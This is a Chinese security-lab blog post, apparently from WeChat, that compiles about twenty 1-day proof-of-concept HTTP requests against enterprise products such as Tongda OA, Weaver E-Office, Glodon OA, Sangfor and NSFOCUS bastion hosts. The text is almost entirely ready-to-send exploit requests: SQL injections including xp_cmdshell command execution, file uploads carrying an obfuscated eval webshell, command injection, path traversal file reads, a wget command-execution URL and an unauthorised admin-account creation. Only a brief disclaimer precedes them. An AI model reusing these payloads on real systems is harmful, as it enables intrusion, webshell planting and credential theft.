阅读须知
天擎攻防实验室的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
0x01 通达OA sql注入漏洞(CVE-2023-4166 )
GET /general/
system
/seal_manage/iweboffice/delete_seal.php?DELETE_STR=
1
)%20and%20(
substr
(DATABASE(),
1
,
1
))=char(
84
)%20and%20(
select
%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(
1
)=(
1
HTTP/
1.1
Host:
127.0
.
0
.
1
:
8080
User-Agent: Mozilla/
5.0
(Windows NT
10.0
; Win64; x64; rv:
109.0
) Gecko/
20100101
Firefox/
116.0
Accept: text/html,application/xhtml+xml,application/xml;
q
=
0
.
9
,image/avif,image/webp,*
/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
0x02 泛微E-Office9文件上传漏洞(CVE-2023-2648 )
POST
/inc/jquery/uploadify/uploadify.php
HTTP/1.1
Host
: 192.168.233.10:8082
User-Agent
: test
Connection
: close
Content-Length
: 493
Accept-Encoding
: gzip
Content-Type
: multipart/form-data
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name=
"Filedata"
; filename=
"666.php"
Content-Type: application/octet-stream
phpinfo();
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
0x03 天钥安全网关前台sql注入
POST /ops/index.php?c=Reportguide&a=checkrn HTTP/1.1
Host: ****
Connection: close
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="88", "Google Chrome";v="88", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Language: zh-CN,zh;q=0.9
Cookie: ****
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
checkname=123&tagid=123
sqlmap -u
"https://****/ops/index.php?c=Reportguide&a=checkrn"
--data
"checkname=123&tagid=123"
-v3 --skip-waf --random-agent
0X04 汉得SRM tomcat.jsp 登录绕过漏洞
/tomcat.jsp?dataName=role_id&dataValue=1
/tomcat.jsp?dataName=user_id&dataValue=1
然后访问后台:/main.screen
0x05 广联达OA SQL注入漏洞
POST
/Webservice/IM/Config/ConfigService.asmx/GetIMDictionary
HTTP/1.1
Host
: xxx.com
Upgrade-Insecure-Requests
: 1
User-Agent
: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept
: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer
: http://xxx.com:8888/Services/Identification/Server/Incompatible.aspx
Accept-Encoding
: gzip, deflate
Accept-Language
: zh-CN,zh;q=0.9
Cookie
:
Connection
: close
Content-Type
: application/x-www-form-urlencoded
Content-Length
: 88
dasdas=&key=1' UNION ALL
SELECT
top
1812
concat
(F_CODE,
':'
,F_PWD_MD5)
from
T_ORG_USER
--
0x06 广联达OA 后台文件上传漏洞
POST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1
Host
: 10.10.10.1:8888
X-Requested-With
: Ext.basex
Accept
: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language
: zh-Hans-CN,zh-Hans;q=0.5
User-Agent
: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept-Encoding
: gzip, deflate
Content-Type
: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj
Accept
: */*
Origin
: http://10.10.10.1
Referer
: http://10.10.10.1:8888/Workflow/Workflow.aspx?configID=774d99d7-02bf-42ec-9e27-caeaa699f512&menuitemid=120743&frame=1&modulecode=GTP.Workflow.TaskCenterModule&tabID=40
Cookie
:
Connection
: close
Content-Length
: 421
------WebKitFormBoundaryFfJZ4PlAZBixjELj
Content-Disposition: form-data; filename=
"1.aspx"
;filename=
"1.jpg"
Content-Type: application/text
<%@ Page Language=
"Jscript"
Debug=
true
%>
<%
var
FRWT=
'XeKBdPAOslypgVhLxcIUNFmStvYbnJGuwEarqkifjTHZQzCoRMWD'
;
var
GFMA=Request.Form(
"qmq1"
);
var
ONOQ=FRWT(
19
) + FRWT(
20
) + FRWT(
8
) + FRWT(
6
) + FRWT(
21
) + FRWT(
1
);
eval
(GFMA, ONOQ);
%>
------WebKitFormBoundaryFfJZ4PlAZBixjELj--
0x07 深信服报表 版本有限制
POST /rep/login HTTP/1.1
Host: URL
Cookie:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac 0s X 10.15: ry:109.0)Gecko/20100101 Firefox/115.0
Accept:text/html,application/xhtml+xml,application/xml;g=0,9, image/avif, image/webp,*/*;q=0.8 Accept-Language:zh-CN, zh;g=0.8, zh-TW;g=0.7, zh-HK;g=0.5,en-US;g=0.3,en;g=0.2
Accept-Encoding: gzip deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site Pragma: no-cache Cache-Control: no-cache14 Te: trailers
Connection: close
Content-Type:application/x-www-form-urlencoded
Content-Length: 126 clsMode=cls_mode_login&index=index&log_type=report&page=login&rnd=0.7550103466497915&userID=admin%0Aid -a %0A&userPsw=tmbhuisq
0x08 深信服应用交付系统命令执行漏洞
POST /rep/login
Host:
10.10
.
10.1
:
85
clsMode=cls_mode_login%0Als%0A&
index
=
index
&log_type=report&loginType=account&page=login&rnd=
0
&userID=admin&userPsw=
123
0x09 网神 SecGate 3600 防火墙 obj_app_upfile 任意文件上传漏洞
POST
/?g=obj_app_upfile
HTTP/1.1
Host
: x.x.x.x
Accept
: */*
Accept-Encoding
: gzip, deflate
Content-Length
: 574
Content-Type
: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc
User-Agent
: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-
data
; name=
"MAX_FILE_SIZE"
10000000
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-
data
; name=
"upfile"
; filename=
"vulntest.php"
Content-Type: text/plain
<?php php马?>
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-
data
; name=
"submit_post"
obj_app_upfile
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-
data
; name=
"__hash__"
0
b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundaryJpMyThWnAxbcBBQc--
马儿路径:attachements/xxx.php
0x10 泛微E-Office9文件上传漏洞 CVE-2023-2523 POC
POST/Emobile/App/Ajax/ajax.php?action=mobile_upload_save HTTP/1.1
Host:192.168.233.10:8082
Cache-Control:max-age=0
Upgrade-Insecure-Requests:1
Origin:null
Content-Type:multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Accept-Encoding:gzip, deflate
Accept-Language:en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection:close
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition:form-data; name="upload_quwan"; filename="1.php."
Content-Type:image/jpeg
<?phpphpinfo();?>
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
0x11 泛微 E-Cology 某版本 SQL注入漏洞 POC
POST /dwr/call/plaincall/CptDwrUtil.ifNewsCheckOutByCurrentUser.dwr HTTP/1.1
Host
: ip:port
User-Agent
: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
Connection
: close
Content-Length
: 189
Content-Type
: text/plain
Accept-Encoding
: gzip
callCount
=
1
page
=
httpSessionId
=
scriptSessionId
=
c0-scriptName
=DocDwrUtil
c0-methodName
=ifNewsCheckOutByCurrentUser
c0-id
=
0
c0-param0
=string:
1
AND
1
=
1
c0-param1
=string:
1
batchId
=
0
0x12 金和OA C6-GetSqlData.aspx SQL注入漏洞 POC
POST /C6/Control/GetSqlData.aspx/.ashx
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
Connection: close
Content-Length: 189
Content-Type: text/plain
Accept-Encoding: gzip
exec
master..xp_cmdshell
'ipconfig'
0x13 大华智慧园区综合管理平台 searchJson SQL注入漏洞 POC
GET /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(
1
,concat(
0x7e
,(
select
%20md5(
388609
)),
0x7e
),
1
)--%22%7D/extend/%7B%7D HTTP/
1.1
Host:
127.0
.
0
.
1
:
7443
User-Agent: Mozilla/
5.0
(Macintosh; Intel Mac OS X
10_14_3
) AppleWebKit/
605.1
.
15
(KHTML, like Gecko) Version/
12.0
.
3
Safari/
605.1
.
15
Accept-Encoding: gzip, deflate
Connection:
close
0x13 大华智慧园区综合管理平台 文件上传漏洞 POC
POST
/publishing/publishing/material/file/video
HTTP/1.1
Host
: 127.0.0.1:7443
User-Agent
: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length
: 804
Content-Type
: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7
Accept-Encoding
: gzip, deflate
Connection
: close
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name=
"Filedata"
; filename=
"0EaE10E7dF5F10C2.jsp"
<%
contentType=
"text/html; charset=GBK"
%><%
import
=
"java.math.BigInteger"
%><%
import
=
"java.security.MessageDigest"
%><% MessageDigest md5 =
null
;md5 = MessageDigest.getInstance(
"MD5"
);
String
s =
"123456"
;
String
miyao =
""
;
String
jiamichuan = s + miyao;md5.update(jiamichuan.getBytes());
String
md5String =
new
BigInteger(
1
, md5.digest()).toString(
16
);out.println(md5String);
new
java.io.File(application.getRealPath(request.getServletPath())).delete();%>
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name=
"poc"
poc
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name=
"Submit"
submit
--dd8f988919484abab3816881c55272a7--
0x14 用友时空KSOA PayBill SQL注入漏洞 POC
POST /servlet/PayBill?caculate&_rnd= HTTP/1.1
Host
: 1.1.1.1
User-Agent
: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length
: 134
Accept-Encoding
: gzip, deflate
Connection
: close
<
root
>
<
name
>
1
</
name
>
<
name
>
1'WAITFOR DELAY '00:00:03';-
</
name
>
<
name
>
1
</
name
>
<
name
>
102360
</
name
>
</
root
>
命令执行:
exec master..xp_cmdshell 'whoami';
0x15 绿盟 SAS堡垒机 GetFile 任意文件读取漏洞 POC
GET
/api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin
HTTP/1.1
Host
: 1.1.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding
: gzip, deflate
Connection
: close
0x16 绿盟 SAS堡垒机 Exec 远程命令执行漏洞 POC
GET
/webconf/Exec/index?cmd=wget%20xxx.xxx.xxx
HTTP/1.1
Host
: 1.1.1.1
User-Agent
: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type
: application/x-www-form-urlencoded
Accept-Encoding
: gzip, deflate
Connection
: close
0x17 安恒 明御运维审计与风险控制系统 xmlrpc.sock 任意用户添加漏洞 POC
POST
/service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://test/wsrpc
HTTP/1.1
Host
: 10.10.10.10
Cookie:
Upgrade-Insecure-Requests
: 1
User-Agent
: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type
: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Connection
: close
<
methodCall
>
<
methodName
>
web.user_add
</
methodName
>
<
params
>
<
param
>
<
value
>
<
array
>
<
data
>
<
value
>
<
string
>
admin
</
string
>
</
value
>
<
value
>
<
string
>
5
</
string
>
</
value
>
<
value
>
<
string
>
10.10.10.10
</
string
>
</
value
>
</
data
>
</
array
>
</
value
>
</
param
>
<
param
>
<
value
>
<
struct
>
<
member
>
<
name
>
uname
</
name
>
<
value
>
<
string
>
test
</
string
>
</
value
>
</
member
>
<
member
>
<
name
>
name
</
name
>
<
value
>
<
string
>
test
</
string
>
</
value
>
</
member
>
<
member
>
<
name
>
pwd
</
name
>
<
value
>
<
string
>
ABC123!@#
</
string
>
</
value
>
</
member
>
<
member
>
<
name
>
authmode
</
name
>
<
value
>
<
string
>
1
</
string
>
</
value
>
</
member
>
<
member
>
<
name
>
deptid
</
name
>
<
value
>
<
string
>
</
string
>
</
value
>
</
member
>
<
member
>
<
name
>
</
name
>
<
value
>
<
string
>
</
string
>
</
value
>
</
member
>
<
member
>
<
name
>
mobile
</
name
>
<
value
>
<
string
>
</
string
>
</
value
>
</
member
>
<
member
>
<
name
>
comment
</
name
>
<
value
>
<
string
>
</
string
>
</
value
>
</
member
>
<
member
>
<
name
>
roleid
</
name
>
<
value
>
<
string
>
102
</
string
>
</
value
>
</
member
>
</
struct
>
</
value
>
</
param
>
</
params
>
</
methodCall
>
0x18 某信景云终端安全管理系统 login SQL注入漏洞
POST /api/user/login
captcha=&password=21232f297a57a5a743894a0e4a801fc3&username=admin'and(
select
*
from
(
select
+
sleep
(
3
))a)=
'
0x19 某和OA C6-GetSqlData.aspx SQL注入漏洞
POST /C6/Control/GetSqlData.aspx/.ashx
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
Connection: close
Content-Length: 189
Content-Type: text/plain
Accept-Encoding: gzip
exec master..xp_cmdshell 'ipconfig'
0x20 某友 移动管理系 统 uploadApk.do 任意文件上传漏洞
POST
/maportal/appmanager/uploadApk.do?pk_obj=
HTTP/1.1
Host
:
Content-Type
: multipart/form-data; boundary=----WebKitFormBoundaryvLTG6zlX0gZ8LzO3
User-Agent
: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept
: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Cookie
: JSESSIONID=4ABE9DB29CA45044BE1BECDA0A25A091.server
Connection
: close
------WebKitFormBoundaryvLTG6zlX0gZ8LzO3
Content-Disposition: form-
data
; name=
"downloadpath"
; filename=
"a.jsp"
Content-Type: application/msword
hello
------WebKitFormBoundaryvLTG6zlX0gZ8LzO3--
原文始发于微信公众号(天擎攻防实验室):HW特别行动 | 1day漏洞POC整理最新
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论